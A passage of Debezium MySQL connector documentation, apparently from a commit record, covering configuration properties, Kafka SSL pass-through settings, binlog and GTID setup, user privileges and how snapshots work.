_databaseName_._schemaName_._tableName_._columnName_.\n\n|`column.mask.with._length_.chars`\n|_n\/a_\n|An optional comma-separated list of regular expressions that match the fully-qualified names of character-based columns whose values should be replaced in the change event message values with a field value consisting of the specified number of asterisk (`*`) characters. Multiple properties with different lengths can be used in a single configuration, although in each the length must be a positive integer or zero. Fully-qualified names for columns are of the form _databaseName_._tableName_._columnName_, or _databaseName_._schemaName_._tableName_._columnName_.\n\n|`column.propagate.source.type` 0.8.0 and later\n|_n\/a_\n|An optional comma-separated list of regular expressions that match the fully-qualified names of columns whose original type and length should be added as a parameter to the corresponding field schemas in the emitted change messages.\nThe schema parameters `pass:[_]pass:[_]debezium.source.column.type`, `pass:[_]pass:[_]debezium.source.column.length` and `pass:[_]debezium.source.column.scale` will be used to propagate the original type name and length (for variable-width types), respectively.\nUseful to properly size corresponding columns in sink databases.\nFully-qualified names for columns are of the form _databaseName_._tableName_._columnName_, or _databaseName_._schemaName_._tableName_._columnName_.\n\n|`time.precision.mode`\n|`adaptive_time{zwsp}_microseconds`\n| Time, date, and timestamps can be represented with different kinds of precision, including: `adaptive_time_microseconds` (the default) captures the date, datetime and timestamp values exactly as in the database using either millisecond, microsecond, or nanosecond precision values based on the database column's type, with the exception of TIME type fields, which are always captured as microseconds; `adaptive` (deprecated) captures the time and timestamp values exactly as in the database using either millisecond, microsecond, or nanosecond precision values based on the database column's type; or `connect` always represents time and timestamp values using Kafka Connect's built-in representations for Time, Date, and Timestamp, which uses millisecond precision regardless of the database columns' precision. See <<temporal-values>>.\n\n|`decimal.handling.mode` +\n`string` in 0.7.4 and later\n|`precise`\n| Specifies how the connector should handle values for `DECIMAL` and `NUMERIC` columns: `precise` (the default) represents them precisely using `java.math.BigDecimal` values represented in change events in a binary form; or `double` represents them using `double` values, which may result in a loss of precision but will be far easier to use. `string` option encodes values as formatted string which is easy to consume but a semantic information about the real type is lost. See <<decimal-values>>.\n\n|`bigint.unsigned.handling.mode` +\n0.6.1 and later\n|`long`\n| Specifies how BIGINT UNSIGNED columns should be represented in change events, including: `precise` uses `java.math.BigDecimal` to represent values, which are encoded in the change events using a binary representation and Kafka Connect's `org.apache.kafka.connect.data.Decimal` type; `long` (the default) represents values using Java's `long`, which may not offer the precision but will be far easier to use in consumers. `long` is usually the preferable setting. Only when working with values larger than 2^63, the `precise` setting should be used as those values can't be conveyed using `long`. See <<data-types>>.\n\n|`include.schema.changes`\n|`true`\n|Boolean value that specifies whether the connector should publish changes in the database schema to a Kafka topic with the same name as the database server ID. Each schema change will be recorded using a key that contains the database name and whose value includes the DDL statement(s). This is independent of how the connector internally records database history. The default is `true`.\n\n|`include.query`\n|`false`\n|Boolean value that specifies whether the connector should include the original SQL query that generated the change event. +\nNote: This option requires MySQL be configured with the binlog_rows_query_log_events option set to ON. Query will not be present for events generated from the snapshot process. +\nWARNING: Enabling this option may expose tables or fields explicitly blacklisted or masked by including the original SQL statement in the change event. For this reason this option is defaulted to 'false'.\n\n|`event.deserialization{zwsp}.failure.handling.mode` +\n0.6.2 and later\n|`fail`\n| Specifies how the connector should react to exceptions during deserialization of binlog events.\n`fail` will propagate the exception (indicating the problematic event and its binlog offset), causing the connector to stop. +\n`warn` will cause the problematic event to be skipped and the problematic event and its binlog offset to be logged\n(make sure that link:\/docs\/configuration\/logging\/[the logger] is set to the `WARN` or `ERROR` level). +\n`ignore` will cause problematic event will be skipped.\n\n|`inconsistent.schema.handling.mode` +\n0.7.3 and later\n|`fail`\n| Specifies how the connector should react to binlog events that relate to tables that are not present in internal schema representation (i.e. internal representation is not consistent with database)\n`fail` will throw an exception (indicating the problematic event and its binlog offset), causing the connector to stop. +\n`warn` will cause the problematic event to be skipped and the problematic event and its binlog offset to be logged\n(make sure that link:\/docs\/configuration\/logging\/[the logger] is set to the `WARN` or `ERROR` level). +\n`ignore` will cause the problematic event to be skipped.\n\n|`max.queue.size`\n|`8192`\n|Positive integer value that specifies the maximum size of the blocking queue into which change events read from the database log are placed before they are written to Kafka. This queue can provide backpressure to the binlog reader when, for example, writes to Kafka are slower or if Kafka is not available. Events that appear in the queue are not included in the offsets periodically recorded by this connector. Defaults to 8192, and should always be larger than the maximum batch size specified in the `max.batch.size` property.\n\n|`max.batch.size`\n|`2048`\n|Positive integer value that specifies the maximum size of each batch of events that should be processed during each iteration of this connector. Defaults to 2048.\n\n|`poll.interval.ms`\n|`1000`\n|Positive integer value that specifies the number of milliseconds the connector should wait during each iteration for new change events to appear. Defaults to 1000 milliseconds, or 1 second.\n\n|`connect.timeout.ms`\n|`30000`\n|A positive integer value that specifies the maximum time in milliseconds this connector should wait after trying to connect to the MySQL database server before timing out. Defaults to 30 seconds.\n\n|`gtid.source.includes`\n|\n|A comma-separated list of regular expressions that match source UUIDs in the GTID set used to find the binlog position in the MySQL server. Only the GTID ranges that have sources matching one of these include patterns will be used. May not be used with `gtid.source.excludes`.\n\n|`gtid.source.excludes`\n|\n|A comma-separated list of regular expressions that match source UUIDs in the GTID set used to find the binlog position in the MySQL server. Only the GTID ranges that have sources matching none of these exclude patterns will be used. May not be used with `gtid.source.includes`.\n\n|`gtid.new.channel.position` +\n0.9.0 and later\n|`latest`\n| When set to `latest`, when the connector sees a new GTID channel, it will start consuming from the last executed transaction in that GTID channel. If set to `earliest`, the connector starts reading that channel from the first available (not purged) GTID position. `earliest` is useful when you have a active-passive MySQL setup where Debezium is connected to master, in this case during failover the slave with new UUID (and GTID channel) starts receiving writes before Debezium is connected. These writes would be lost when using `latest`.\n\n|`tombstones.on.delete` +\n0.7.3 and later\n|`true`\n| Controls whether a tombstone event should be generated after a delete event. +\nWhen `true` the delete operations are represented by a delete event and a subsequent tombstone event. When `false` only a delete event is sent. +\nEmitting the tombstone event (the default behavior) allows Kafka to completely delete all events pertaining to the given key once the source record got deleted.\n\n|`ddl.parser.mode` +\n0.8.0 and later\n|`antlr`\n| Controls which parser should be used for parsing DDL statements when building up the meta-model of the captured database structure. +\nCan be one of `legacy` (for the legacy hand-written parser implementation) or `antlr` (for new Antlr based implementation introduced in Debezium 0.8.0). +\nWhile the legacy parser remains the default for Debezium 0.8.x, please try out the new implementation and report back any issues you encounter. +\nThe new parser is the default as of 0.9, followed by the removal of the old implementation in a future version.\n\n|=======================\n\n\nThe following _advanced_ configuration properties have good defaults that will work in most situations and therefore rarely need to be specified in the connector's configuration.\n\n[cols=\"35%a,10%a,55%a\",width=100,options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|Property\n|Default\n|Description\n\n|`connect.keep.alive`\n|`true`\n|A boolean value that specifies whether a separate thread should be used to ensure the connection to the MySQL server\/cluster is kept alive.\n\n|`table.ignore.builtin`\n|`true`\n|Boolean value that specifies whether built-in system tables should be ignored. This applies regardless of the table whitelist or blacklists. By default system tables are excluded from monitoring, and no events are generated when changes are made to any of the system tables.\n\n|`database.history.kafka.recovery.poll.interval.ms`\n|`100`\n|An integer value that specifies the maximum number of milliseconds the connector should wait during startup\/recovery while polling for persisted data. The default is 100ms.\n\n|`database.history.kafka.recovery.attempts`\n|`4`\n|The maximum number of times that the connector should attempt to read persisted history data before the connector recovery fails with an error. The maximum amount of time to wait after receiving no data is `recovery.attempts` x `recovery.poll.interval.ms`.\n\n|`database.history.skip.unparseable.ddl`\n|`false`\n|Boolean value that specifies if connector should ignore malformed or unknown database statements or stop processing and let operator to fix the issue.\nThe safe default is `false`.\nSkipping should be used only with care as it can lead to data loss or mangling when binlog is processed.\n\n|`database.history.store.only.monitored.tables.ddl` +\n0.7.2 and later\n|`false`\n|Boolean value that specifies if connector should should record all DDL statements or (when `true`) only those that are relevant to tables that are monitored by Debezium (via filter configuration).\nThe safe default is `false`.\nThis feature should be used only with care as the missing data might be necessary when the filters are changed.\n\n|`database.ssl.mode`\n|`disabled`\n|Specifies whether to use an encrypted connection. The default is `disabled`, and specifies to use an unencrypted connection.\n\nThe `preferred` option establishes an encrypted connection if the server supports secure connections but falls back to an unencrypted connection otherwise.\n\nThe `required` option establishes an encrypted connection but will fail if one cannot be made for any reason.\n\nThe `verify_ca` option behaves like `required` but additionally it verifies the server TLS certificate against the configured Certificate Authority (CA) certificates and will fail if it doesn't match any valid CA certificates.\n\nThe `verify_identity` option behaves like `verify_ca` but additionally verifies that the server certificate matches the host of the remote connection.\n\n|`binlog.buffer.size` +\n0.7.0 and later\n|0\n|The size of a look-ahead buffer used by the binlog reader. +\nUnder specific conditions it is possible that MySQL binlog contains uncommitted data finished by a `ROLLBACK` statement.\nTypical examples are using savepoints or mixing temporary and regular table changes in a single transaction. +\nWhen a beginning of a transaction is detected then Debezium tries to roll forward the binlog position and find either `COMMIT` or `ROLLBACK` so it can decide whether the changes from the transaction will be streamed or not.\nThe size of the buffer defines the maximum number of changes in the transaction that Debezium can buffer while searching for transaction boundaries.\nIf the size of transaction is larger than the buffer then Debezium needs to rewind and re-read the events that has not fit into the buffer while streaming. Value `0` disables buffering. +\nDisabled by default. +\n_Note:_ This feature should be considered an incubating one. We need a feedback from customers but it is expected that it is not completely polished.\n\n|`snapshot.mode`\n|`initial`\n|Specifies the criteria for running a snapshot upon startup of the connector. The default is `initial`, and specifies the connector can run a snapshot only when no offsets have been recorded for the logical server name. The `when_needed` option specifies that the connector run a snapshot upon startup whenever it deems it necessary (when no offsets are available, or when a previously recorded offset specifies a binlog location or GTID that is not available in the server). The `never` option specifies that the connect should never use snapshots and that upon first startup with a logical server name the connector should read from the beginning of the binlog; this should be used with care, as it is only valid when the binlog is guaranteed to contain the entire history of the database. If you don't need the topics to contain a consistent snapshot of the data but only need them to have the changes since the connector was started, you can use the `schema_only` option, where the connector only snapshots the schemas (not the data).\n\n`schema_only_recovery` is a recovery option for an existing connector to recover a corrupted or lost database history topic, or to periodically \"clean up\" a database history topic (which requires infinite retention) that may be growing unexpectedly.\n\n|`snapshot.locking.mode` +\n_0.7.3 and later_\n|`minimal`\n|Controls if and how long the connector holds onto the global MySQL read lock (preventing any updates to the database) while it is performing a snapshot. There are three possible values `minimal`, `extended`, and `none`. +\n\n`minimal` The connector holds the global read lock for just the initial portion of the snapshot while the connector reads the database schemas and other metadata. The remaining work in a snapshot involves selecting all rows from each table, and this can be done in a consistent fashion using the REPEATABLE READ transaction even when the global read lock is no longer held and while other MySQL clients are updating the database. +\n\n`extended` In some cases where clients are submitting operations that MySQL excludes from REPEATABLE READ semantics, it may be desirable to block all writes for the entire duration of the snapshot. For these such cases, use this option. +\n\n`none` Will prevent the connector from acquiring any table locks during the snapshot process. This value can be used with all snapshot modes but it is safe to use if and _only_ if no schema changes are happening while the snapshot is taken. Note that for tables defined with MyISAM engine, the tables would still be locked despite this property being set as MyISAM acquires a table lock. This behaviour is unlike InnoDB engine which acquires row level locks.\n\n|`snapshot.minimal.locks` +\n_deprecated since 0.7.3_\n|`true`\n|Controls how long the connector holds onto the global MySQL read lock (preventing any updates to the database) while it is performing a snapshot. The default is `true`, meaning the connector holds the global read lock for just the initial portion of the snapshot while the connector reads the database schemas and other metadata. The remaining work in a snapshot involves selecting all rows from each table, and this can be done in a consistent fashion using the `REPEATABLE READ` transaction even when the global read lock is no longer held and while other\nMySQL clients are updating the database. However, in some cases where clients are submitting operations that MySQL excludes from `REPEATABLE READ` semantics, it may be desirable to _block all writes_ for the entire duration of the snapshot. In only such cases, set this property to `false`. +\n_Deprecated:_ This option has been deprecated and replaced with the `snapshot.locking.mode` configuration option. This option will be removed in a future release. +\n\nA `snapshot.minimal.locks` value of `true` should be replaced with `snapshot.locking.mode` set to `minimal`. +\n\nA `snapshot.minimal.locks` value of `false` should be replaced with `snapshot.locking.mode` set to `extended`.\n\n|`snapshot.select.statement.overrides` +\n0.7.0 and later\n|\n|Controls which rows from tables will be included in snapshot. +\nThis property contains a comma-separated list of fully-qualified tables _(DB_NAME.TABLE_NAME)_. Select statements for the individual tables are specified in further configuration properties, one for each table, identified by the id `snapshot.select.statement.overrides.[DB_NAME].[TABLE_NAME]`. The value of those properties is the SELECT statement to use when retrieving data from the specific table during snapshotting. _A possible use case for large append-only tables is setting a specific point where to start (resume) snapshotting, in case a previous snapshotting was interrupted._ +\n*Note*: This setting has impact on snapshots only. Events captured from binlog are not affected by it at all.\n\n|`min.row.count.to.stream.results`\n|`1000`\n|During a snapshot operation, the connector will query each included table to produce a read event for all rows in that table. This parameter determines whether the MySQL connection will pull all results for a table into memory (which is fast but requires large amounts of memory), or whether the results will instead be streamed (can be slower, but will work for very large tables). The value specifies the minimum number of rows a table must contain before the connector will stream results, and defaults to 1,000. Set this parameter to '0' to skip all table size checks and always stream all results during a snapshot.\n\n|`heartbeat.interval.ms` +\n0.7.3 and later\n|`0`\n|Controls how frequently the heartbeat messages are sent. +\nThis property contains an interval in milli-seconds that defines how frequently the connector sends heartbeat messages into a heartbeat topic.\nSet this parameter to `0` to not send heartbeat messages at all. +\nDisabled by default.\n\n|`heartbeat.topics.prefix` +\n0.7.3 and later\n|`__debezium-heartbeat`\n|Controls the naming of the topic to which heartbeat messages are sent. +\nThe topic is named according to the pattern `<heartbeat.topics.prefix>.<server.name>`.\n\n|`database.initial.statements` +\n0.8.0 and later\n|\n|A semicolon separated list of SQL statements to be executed when a JDBC connection (not the transaction log reading connection) to the database is established.\nUse doubled semicolon (';;') to use a semicolon as a character and not as a delimiter. +\n_Note: The connector may establish JDBC connections at its own discretion, so this should typically be used for configuration of session parameters only, but not for executing DML statements._\n\n|`snapshot.delay.ms` +\n0.8.0 and later\n|\n|An interval in milli-seconds that the connector should wait before taking a snapshot after starting up; +\nCan be used to avoid snapshot interruptions when starting multiple connectors in a cluster, which may cause re-balancing of connectors.\n\n|`snapshot.fetch.size` +\n0.9.5 and later\n|\n|Specifies the maximum number of rows that should be read in one go from each table while taking a snapshot.\nThe connector will read the table contents in multiple batches of this size.\n\n|`enable.time.adjuster` +\n0.9.3 and later\n|\n|MySQL allows user to insert year value as either 2-digit or 4-digit.\nIn case of two digits the value is automatically mapped to 1970 - 2069 range.\nThis is usually done by database. +\nSet to `true` (the default) when Debezium should do the conversion. +\nSet to `false` when conversion is fully delegated to the database.\n|=======================\n\nThe connector also supports _pass-through_ configuration properties that are used when creating the Kafka producer and consumer. Specifically, all connector configuration properties that begin with the `database.history.producer.` prefix are used (without the prefix) when creating the Kafka producer that writes to the database history, and all those that begin with the prefix `database.history.consumer.` are used (without the prefix) when creating the Kafka consumer that reads the database history upon connector startup.\n\nFor example, the following connector configuration properties can be used to http:\/\/kafka.apache.org\/documentation.html#security_configclients[secure connections to the Kafka broker]:\n\nIn addition to the _pass-through_ to the Kafka producer and consumer, the properties starting with `database.`, e.g. `database.tinyInt1isBit=false` are passed to the JDBC URL.\n\n[source,indent=0]\n----\ndatabase.history.producer.security.protocol=SSL\ndatabase.history.producer.ssl.keystore.location=\/var\/private\/ssl\/kafka.server.keystore.jks\ndatabase.history.producer.ssl.keystore.password=test1234\ndatabase.history.producer.ssl.truststore.location=\/var\/private\/ssl\/kafka.server.truststore.jks\ndatabase.history.producer.ssl.truststore.password=test1234\ndatabase.history.producer.ssl.key.password=test1234\ndatabase.history.consumer.security.protocol=SSL\ndatabase.history.consumer.ssl.keystore.location=\/var\/private\/ssl\/kafka.server.keystore.jks\ndatabase.history.consumer.ssl.keystore.password=test1234\ndatabase.history.consumer.ssl.truststore.location=\/var\/private\/ssl\/kafka.server.truststore.jks\ndatabase.history.consumer.ssl.truststore.password=test1234\ndatabase.history.consumer.ssl.key.password=test1234\n----\n\nBe sure to consult the http:\/\/kafka.apache.org\/documentation.html[Kafka documentation] for all of the configuration properties for Kafka producers and consumers. (The MySQL connector does use the http:\/\/kafka.apache.org\/documentation.html#newconsumerconfigs[new consumer].)\n","old_contents":"= Debezium Connector for MySQL\n:awestruct-layout: doc\n:toc:\n:toc-placement: macro\n:linkattrs:\n:icons: font\n:source-highlighter: highlight.js\n\ntoc::[]\n\nDebezium's MySQL Connector can monitor and record all of the row-level changes in the databases on a MySQL server or HA MySQL cluster. The first time it connects to a MySQL server\/cluster, it reads a consistent snapshot of all of the databases. When that snapshot is complete, the connector continuously reads the changes that were committed to MySQL 5.6 or later and generates corresponding insert, update and delete events. All of the events for each table are recorded in a separate Kafka topic, where they can be easily consumed by applications and services.\n\nAs of Debezium 0.4.0, this connector adds preliminary support for https:\/\/aws.amazon.com\/rds\/mysql\/[Amazon RDS] and https:\/\/aws.amazon.com\/rds\/aurora\/[Amazon Aurora (MySQL compatibility)]. However, due to limitations of these hosted forms of MySQL, the connector retains locks during an initial consistent snapshot link:#snapshots-without-global-read-locks[for the duration of the snapshot].\n\n[[overview]]\n== Overview\n\nMySQL's http:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/binary-log.html[_binary log_], or _binlog_, records all operations in the same order they are committed by the database, including changes to the schemas of tables or changes to data stored within the tables. MySQL uses its binlog for replication and recovery.\n\nDebezium's MySQL connector reads MySQL's binary log to understand what and in what order data has changed. It then produces a _change event_ for every row-level insert, update, and delete operation in the binlog, recording all the change events for each table in a separate Kafka topic. Your client applications read the Kafka topics that correspond to the database tables it's interested in following, and react to every row-level event it sees in those topics.\n\nMySQL is usually set up to purge the binary logs after some period of time. This means that the binary log won't have the complete history of all changes that have been made to the database. Therefore, when the MySQL connector first connects to a particular MySQL sever or cluster, it starts by performing a link:#snapshot[_consistent snapshot_] of each of the databases. When the connector completes the snapshot, it then starts reading the binlog from the exact point at which the snapshot was made. This way, we start with a consistent view of all of the data, yet continue reading without having lost any of the changes made while the snapshot was being made.\n\nThe connector is also very tolerant of failures. As the connector reads the binlog and produces events, it records the binlog position with each event. If the connector stops for any reason (including communication failures, network problems, or crashes), upon restart it simply continues reading the binlog where it last left off. This includes snapshots: if the snapshot was not completed when the connector is stopped, upon restart it will begin a new snapshot. We'll talk later about how the connector behaves link:#when-things-go-wrong[when things go wrong].\n\n\n[[setting-up-mysql]]\n== Setting up MySQL\n\nBefore the Debezium MySQL connector can be used to monitor the changes committed on a MySQL server, the server must be set up to use _row-level binary logging_ and have a database user with appropriate privileges. If MySQL is configured to use global transaction identifiers (GTIDs), then the Debezium connector can more easily reestablish connection should one of the MySQL servers fail.\n\nThe following sections outline in more detail how to set up these features in MySQL.\n\n[[enabling-the-binlog]]\n=== Enabling the binlog\n\nThe MySQL server must be configured to use a _row-level_ binary log, which is described in more detail in the http:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/replication-options.html[MySQL documentation]. This is most often done in the MySQL server configuration file, and will look similar to the following fragment:\n\n[source]\n----\nserver-id = 223344\nlog_bin = mysql-bin\nbinlog_format = row\nbinlog_row_image = full\nexpire_logs_days = 10\n----\n\nwhere:\n\n* the value for http:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/server-system-variables.html#sysvar_server_id[`server-id`] must be unique for each server and replication client within the MySQL cluster. When we set up the connector, we'll also assign the connector a unique server ID.\n* the value for http:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/replication-options-binary-log.html#sysvar_log_bin[`log_bin`] is the base name for the sequence of binlog files.\n* the value for http:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/replication-options-binary-log.html#sysvar_binlog_format[`binlog_format`] must be set to `row` or `ROW`.\n* the value for https:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/replication-options-binary-log.html#sysvar_binlog_row_image[`binlog_row_image`] must be set to `full` or `FULL`.\n* the value for http:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/server-system-variables.html#sysvar_expire_logs_days[`expire_log_days`] is the number of days for automatic binary log file removal. The default is 0, which means \"no automatic removal,\" so be sure to set a value that is appropriate for your environment.\n\n[TIP]\n====\nRunning a MySQL server with binary logging enabled does slightly reduce performance of the MySQL server, but the benefits generally outweigh the costs. Each binlog reader will also place a small load on the server, so using Debezium is a great way to minimize this load while providing the change events to a large variety and number of consumers.\n====\n\n[[enabling-gtids]]\n[[enabling-gtids-optional]]\n=== Enabling GTIDs (optional)\n\nThe MySQL server can be configured to use https:\/\/dev.mysql.com\/doc\/refman\/5.6\/en\/replication-gtids.html[GTID-based replication]. Global transaction identifiers, or GTIDs, were introduced in MySQL 5.6.5, and they uniquely identify a transaction that occurred on a particular server within a cluster. Using GTIDs greatly simplifies replication and makes it possible to easily confirm whether masters and slaves are consistent. *Note that if you're using an earlier version of MySQL, you will not be able to enable GTIDs.*\n\nEnabling GTIDs can be done in the MySQL server configuration file, and will look similar to the following fragment:\n\n[source]\n----\ngtid_mode = on\nenforce_gtid_consistency = on\n----\n\nwhere:\n\n* the value for https:\/\/dev.mysql.com\/doc\/refman\/5.6\/en\/replication-options-gtids.html#option_mysqld_gtid-mode[`gtid_mode`] specifies the GTID mode of the MySQL server.\n* the value for https:\/\/dev.mysql.com\/doc\/refman\/5.6\/en\/replication-options-gtids.html[`enforce_gtid_consistency`] instructs the server to enforce GTID consistency by allowing execution of only those statements that can be logged in a transactionally safe manner, and is required when using GTIDs.\n\nConsult the https:\/\/dev.mysql.com\/doc\/refman\/5.6\/en\/replication-options-gtids.html#option_mysqld_gtid-mode[MySQL documentation] for details and specifics about setting up GTIDs.\n\n[TIP]\n====\nThe MySQL connector does not require MySQL to use GTIDs and GTID-based replication. Each time the connector starts up, it will automatically detect whether it is enabled and adjust its behavior accordingly.\n====\n\n[[enabling-query-log-events]]\n[[enabling-query-log-events-optional]]\n=== Enabling Query Log Events (optional)\n\nStarting with MySQL 5.6 row based replication can be configured to include the original SQL statement with each binlog event. *Note that if you're using an earlier version of MySQL, you will not be able to enable this feature.*\n\nEnabling this option can be done in the MySQL server configuration file, and will look similar to the following fragment:\n\n[source]\n----\nbinlog_rows_query_log_events = on\n----\n\nwhere:\n\n* the value for https:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/replication-options-binary-log.html#sysvar_binlog_rows_query_log_events[`binlog_rows_query_log_events`] can be set to `on` or `ON` to enable support for including the original SQL statement in the binlog entry.\n\n[[mysql-user]]\n[[create-a-mysql-user-for-the-connector]]\n=== Create a MySQL user for the connector\n\nA MySQL user must be defined that has all of the following permissions on all of the databases that the connector will monitor:\n\n* http:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/privileges-provided.html#priv_select[`SELECT`] - enables the connector to select rows from tables in databases; used only when performing a snapshot\n* http:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/privileges-provided.html#priv_reload[`RELOAD`] - enables the connector of the http:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/flush.html[`FLUSH`] statement to clear or reload various internal caches, flush tables, or acquire locks; used only when performing a snapshot\n* http:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/privileges-provided.html#priv_show-databases[`SHOW DATABASES`] - enables the connector to see database names by issuing the `SHOW DATABASE` statement; used only when performing a snapshot\n* http:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/privileges-provided.html#priv_replication-slave[`REPLICATION SLAVE`] - enables the connector to connect to and read the binlog of its MySQL server; always required for the connector\n* http:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/privileges-provided.html#priv_replication-client[`REPLICATION CLIENT`] - enables the use of `SHOW MASTER STATUS`, `SHOW SLAVE STATUS`, and `SHOW BINARY LOGS`; always required for the connector\n\nFor example, the following statement grants these permissions for a user `debezium` that authenticates with the password `dbz`, where the user can be on any machine:\n\n GRANT SELECT, RELOAD, SHOW DATABASES, REPLICATION SLAVE, REPLICATION CLIENT ON *.* TO 'debezium' IDENTIFIED BY 'dbz';\n\n[WARNING]\n====\nChoose a good password that is different from what we use above.\n\nAlso, the above grant is equivalent to specifying any authenticating client on _any_ hosts, so obviously this is not recommended for production. Instead, in production you would almost certainly limit the replication user to the machine(s) where the MySQL connector is running within a Kafka Connect service, such as `... 'debezium'@'connect.host.acme.com' ...`.\n====\n\n[IMPORTANT]\n====\nWhen using the MySQL connector with https:\/\/aws.amazon.com\/rds\/mysql\/[Amazon RDS], https:\/\/aws.amazon.com\/rds\/aurora\/[Amazon Aurora (MySQL compatibility)], or any other server where the connector's database user is unable to obtain a global read lock, the database user must also have the `LOCK TABLES` permission. See the section on link:#snapshots-without-global-read-locks[snapshots without global read locks] and https:\/\/issues.jboss.org\/projects\/DBZ\/issues\/DBZ-140[DBZ-140] for additional details.\n====\n\n[[supported-mysql-topologies]]\n== Supported MySQL topologies\n\nThe MySQL connector can be used with a variety of MySQL topologies.\n\n[[mysql-standalone]]\n=== MySQL standalone\n\nWhen a single MySQL server is used by itself, then that server must have the binlog enabled (and optionally GTIDs enabled) so that the MySQL connector can be able to monitor it. This is often acceptable, since the binary log can also be used as an http:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/backup-methods.html[incremental backup]. In this case, the MySQL connector will always connect to and follow this standalone MySQL server instance.\n\n[[mysql-master-and-slave]]\n=== MySQL master and slave\n\nhttp:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/replication-solutions.html[MySQL replication] can be used to set up a cluster of MySQL instances, where one of the MySQL server instances is considered the _master_ and the other(s) a _slave_. Topologies can include single master with single slave, single master with multiple slaves, and multiple masters with multiple slaves. Which you choose will depend on your requirements, your backup and recovery strategy, and how you are scaling MySQL to handle large data volumes and queries.\n\nTo use the MySQL connector with one of these topologies, the connector can follow one of the masters or one of the slaves (if that slave has its binlog enabled), but the connector will see only those changes in the cluster that are visible to that server. Generally, this is not a problem except for the multi-master topologies.\n\nThe connector records its position in the server's binlog, which is different on each server in the cluster. Therefore, the connector will need to follow just one MySQL server instance. If that server fails, it must be restarted or recovered before the connector can continue.\n\n[[mysql-clusters]]\n[[highly-available-mysql-clusters]]\n=== Highly Available MySQL clusters\n\nA https:\/\/dev.mysql.com\/doc\/mysql-ha-scalability\/en\/[variety of high availability solutions] exist for MySQL, and they make it far easier to tolerate and almost immediately recover from problems and failures. Most HA MySQL clusters use GTIDs so that slaves are able to keep track of all changes on any of the master.\n\n\n[[multi-master-mysql]]\n=== Multi-Master MySQL\n\nA https:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/mysql-cluster-replication-multi-master.html[multi-master MySQL] topology uses one or more MySQL slaves that each replicate from _multiple_ masters. This is a powerful way to aggregate the replication of multiple MySQL clusters, and requires using GTIDs.\n\nAs of Debezium 0.3.5, the Debezium MySQL connector can use these multi-master MySQL slaves as sources, and can fail over to _different_ multi-master MySQL slaves as long as thew new slave is caught up to the old slave (e.g., the new slave has all of the transactions that were last seen on the first slave). This works even if the connector is only using a subset of databases and\/or tables, as the connector can be configured to include or exclude specific GTID sources when attempting to reconnect to a new multi-master MySQL slave and find the correct position in the binlog.\n\n[[hosted-mysql]]\n=== Hosted MySQL\n\nAs of Debezium 0.4.0, the MySQL connector adds preliminary support for https:\/\/aws.amazon.com\/rds\/mysql\/[Amazon RDS] and https:\/\/aws.amazon.com\/rds\/aurora\/[Amazon Aurora (MySQL compatibility)]. The connector works as usual when reading the binlog, but in these environments the link:#snapshots-without-global-read-locks[connector does perform snapshots differently]. This is because these hosted forms of MySQL prevent database users from being able to obtain a global read lock, so the only way for the connector to obtain a consistent snapshot is to use table-level locks instead. Unfortunately, table-level locks link:https:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/lock-tables-and-transactions.html[affect current transactions], and this means that the locks cannot be released until after the connector completes reading all data and commits its transaction.\n\n\n[[how-it-works]]\n[[how-the-mysql-connector-works]]\n== How the MySQL connector works\n\nThis section goes into detail about how the MySQL connector tracks the structure of the tables, performs snapshots, transform binlog events into Debezium change events, where those events are recorded in Kafka, and how the connector behaves when things go wrong.\n\n[[database-schema-history]]\n=== Database schema history\n\nWhen a database client queries a database, it uses the database's current schema. However, the database schema can be changed at any time, which means that the connector must know what the schema looked like at the time each insert, update, or delete operation is _recorded_. It can't just use the current schema, either, since it may be processing events that are relatively old and may have been recorded before the tables' schemas were changed. Luckily, MySQL includes in the binlog the row-level changes to the data _and_ the DDL statements that are applied to the database. As the connector reads the binlog and comes across these DDL statements, it parses them and updates an in-memory representation of each table's schema, which is then used to understand the structure of the tables at the time each insert, update, or delete occurs and to produce the appropriate change event. It also records in a separate _database history_ Kafka topic all of the DDL statements along with the position in the binlog where each DDL statement appeared.\n\nWhen the connector restarts after having crashed or been stopped gracefully, the connector will start reading the binlog from a specific position (i.e., a specific point in time). The connector rebuilds the table structures that existed _at this point in time_ by reading the database history Kafka topic and parsing all DDL statements up until the point in the binlog where the connector is starting.\n\nThis database history topic is for connector use only, but the connector can optionally generate _schema change events_ on a different topic that is intended for consumer applications. We'll cover this in the link:#schema-change-topic[Schema Change Topic] section.\n\n[NOTE]\n====\nIt is vital that there is a global order of the events in the database schema history, therefore the database history topic must not be partitioned.\nThis means a partition count of 1 must be specified when creating this topic.\nWhen relying on auto topic creation, make sure that Kafka's `num.partitions` configuration option (the default number of partitions) is set to 1.\n====\n\n[[snapshots]]\n=== Snapshots\n\nWhen a MySQL connector that is configured to follow a MySQL server instance is first started, it will by default perform an initial _consistent snapshot_ of a database. This is the default mode, since much of the time the MySQL binlogs no longer contain the complete history of the database.\n\nThe connector performs the following steps each time it takes a snapshot:\n\n1. Grab a global read lock that blocks writes by other database clients.\n2. Start a transaction with https:\/\/dev.mysql.com\/doc\/refman\/5.6\/en\/innodb-consistent-read.html[_repeatable read_ semantics] to ensure that all subsequent reads within this transaction are done against a single consistent snapshot.\n3. Read the current position of the binlog.\n4. Read the schema of the databases and tables allowed by the connector's configuration.\n5. Release the global read lock, allowing other DB clients to again write to the database\n6. Optionally write the DDL changes to the _schema change topic_, including all necessary `DROP ...` and `CREATE ...` DDL statements\n7. Scans all of the database tables and generates on the appropriate table-specific Kafka topics `CREATE` events for each row.\n8. Commit the transaction.\n9. Record in the connector offsets that the connector successfully completed the snapshot.\n\nThe transaction started in step 1 does not prevent other clients from making changes to the tables rows, but will instead provide the connector with a consistent and 